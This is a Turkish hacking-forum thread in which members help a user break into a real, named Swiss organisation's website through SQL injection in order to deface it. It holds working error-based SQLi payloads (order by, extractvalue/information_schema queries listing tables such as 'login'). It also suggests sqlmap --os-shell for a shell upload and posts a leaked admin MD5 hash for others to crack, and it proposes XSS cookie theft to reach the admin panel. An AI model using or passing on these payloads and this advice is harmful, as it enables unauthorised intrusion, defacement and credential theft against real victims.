SQL açıklı sitede takıldım ne yapmam lazım

LydexCoding

Moderasyon Ekibi Çaylak
Az önce bir adet SQL Açıklı site ile karşılaştım ancak nasıl sızacağımı vs. anlamadım yada yapamadım, siteye nasıl sızabilirim ne yapmam lazım

Samariter Münsingen - index.php?id=2

Ekran Görüntüsü;
3anqcv7.png



@SiberAslan aklıma getirdi, öylesine bi bakınayım derken buldum. Teşekkürler <3
 
Moderatör tarafında düzenlendi:

RW

Haftanın Moderatörü
26 Kas 2020
2,436
1,928
Konum
takıldığın yer neresidir ?

Samariter Münsingen - index.php?id=2' order by 9-- - / kolon sayısını buldum 9 çıkıyor

xpath ile denedim hack bar üzerinden ;

Samariter Münsingen - index.php?id=2' and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))--+-

tablo isimleri bu şekil çıkıyor limit 0,1 kısmını limit 1,1 / 1,2 diye artırarak diğer tablolara da bakabilirsin ;

örnek olarak ;

Samariter Münsingen - index.php?id=2' and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 2,1)))--+-

//

bu tabloda login diye bir isim buldum ;

Samariter Münsingen - index.php?id=2' and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 13,1)))--+-

bu şekilde ilerler bu iş istersen hackbar kur kendin ilerle en azından senin bilgin için öğrenmen için iyi olucaktır

+ olarak eror based ile de bakabilirsin forumda yeterince kaynak var
 

LydexCoding

Moderasyon Ekibi Çaylak
takıldığın yer neresidir ?

Samariter Münsingen - index.php?id=2' order by 9-- - / kolon sayısını buldum 9 çıkıyor

xpath ile denedim hack bar üzerinden ;

Samariter Münsingen - index.php?id=2' and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))--+-

tablo isimleri bu şekil çıkıyor limit 0,1 kısmını limit 1,1 / 1,2 diye artırarak diğer tablolara da bakabilirsin ;

örnek olarak ;

Samariter Münsingen - index.php?id=2' and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 2,1)))--+-

//

bu tabloda login diye bir isim buldum ;

Samariter Münsingen - index.php?id=2' and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 13,1)))--+-

bu şekilde ilerler bu iş istersen hackbar kur kendin ilerle en azından senin bilgin için öğrenmen için iyi olucaktır

+ olarak eror based ile de bakabilirsin forumda yeterince kaynak var
Hocam ben index basmak istiyordum. Şu konudaki gibi;
SQLi OTO Shell Upload
 

theostekno

Yeni üye
25 Kas 2022
11
13
Dostum samariter_1 diye bir veritabanı çıkıyor ama onunda içi boş Shell upload etme konusuna gelirsek --os-shell yapıp otomatik olarak aratabilirsin Denedim ondada hata verdi yani çürük site birşey çıkmaz bundan iyi forumlar
 
Az önce bir adet SQL Açıklı site ile karşılaştım ancak nasıl sızacağımı vs. anlamadım yada yapamadım, siteye nasıl sızabilirim ne yapmam lazım

Samariter Münsingen - index.php?id=2

Ekran Görüntüsü;
3anqcv7.png



@SiberAslan aklıma getirdi, öylesine bi bakınayım derken buldum. Teşekkürler <3
Siteye daha önceden sızmış biriyim, databesinde admin girişleri md5 ile korunuyor. Ben kıramamıştım tabii ki isterseniz deniyebilirsiniz.
 
hash: 8686080ffff1804994797c34612eb7b0 bu hocam ben denedim kıramadım deneyebilirsiniz.

Eğerki kaydedilmiş bir hali varsa atabilir misiniz? Kırabilirsem bende size atayım.
hash: 8686080ffff1804994797c34612eb7b0 bu hocam ben denedim kıramadım deneyebilirsiniz.

Dostum samariter_1 diye bir veritabanı çıkıyor ama onunda içi boş Shell upload etme konusuna gelirsek --os-shell yapıp otomatik olarak aratabilirsin Denedim ondada hata verdi yani çürük site birşey çıkmaz bundan iyi forumlar
--os-shell de işe yaramıyor o siteye hocam ya da ben yapamadım.
 

theostekno

Yeni üye
25 Kas 2022
11
13
hash: 8686080ffff1804994797c34612eb7b0 bu hocam ben denedim kıramadım deneyebilirsiniz.


hash: 8686080ffff1804994797c34612eb7b0 bu hocam ben denedim kıramadım deneyebilirsiniz.


--os-shell de işe yaramıyor o siteye hocam ya da ben yapamadım.
Dostum belirttim zaten --os-shell hata veriyor diye zaten çoğu sitede --os-shell hata verir veya sqlmapdeki diğer shell methodları manuel olarak admin paneline erişmek önemli olan bu önemli bir siteyse veya hedef siteyse xss açığı arayıp cookie yoluyla admin panele erisebilirsin herşey sql açığı değildir
 
Dostum belirttim zaten --os-shell hata veriyor diye zaten çoğu sitede --os-shell hata verir veya sqlmapdeki diğer shell methodları manuel olarak admin paneline erişmek önemli olan bu önemli bir siteyse veya hedef siteyse xss açığı arayıp cookie yoluyla admin panele erisebilirsin herşey sql açığı değildir
Haklısınız hocam.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.